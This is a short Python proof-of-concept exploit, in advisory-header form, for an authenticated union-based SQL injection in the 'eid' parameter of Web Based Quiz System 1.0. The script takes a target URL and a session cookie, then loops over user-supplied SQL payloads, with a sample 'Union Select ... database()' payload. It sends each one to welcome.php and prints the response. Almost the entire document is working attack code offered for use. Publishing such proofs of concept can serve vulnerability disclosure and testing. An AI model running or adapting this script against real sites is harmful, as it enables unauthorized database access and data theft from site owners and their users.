''' # Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) # Date: 04-03-2021 # Exploit Author: Deepak Kumar Bharti # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System PoC made in python by Nano ''' import requests, sys def main(): print("U Need to Set PHPSESSID Before u Continue EDIT CODE") siteinput = input('site: ') ## Takes users input req = requests.get(f"{siteinput}/welcome.php") ''' Checks if File is there ''' if req.status_code == 200: pass # Might be Vuln else: print("NOT VULN") sys.exit() # not Vuln while True: print("Example Payloads: Union Select 1,database(),database(),4,5-- -") sql = input('SQLPAYLOADS: ') # Sets the Auth Cookie cookies = { "PHPSESSID": "" } # Shit for logs header = { "upgrade-insecure-requests": "1", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36" } req1 = requests.get(f"{siteinput}/welcome.php?q=quiz&step=2&eid=60377db362694' {sql}&n=2&t=34", cookies=cookies, headers=header) print(req1.text) main()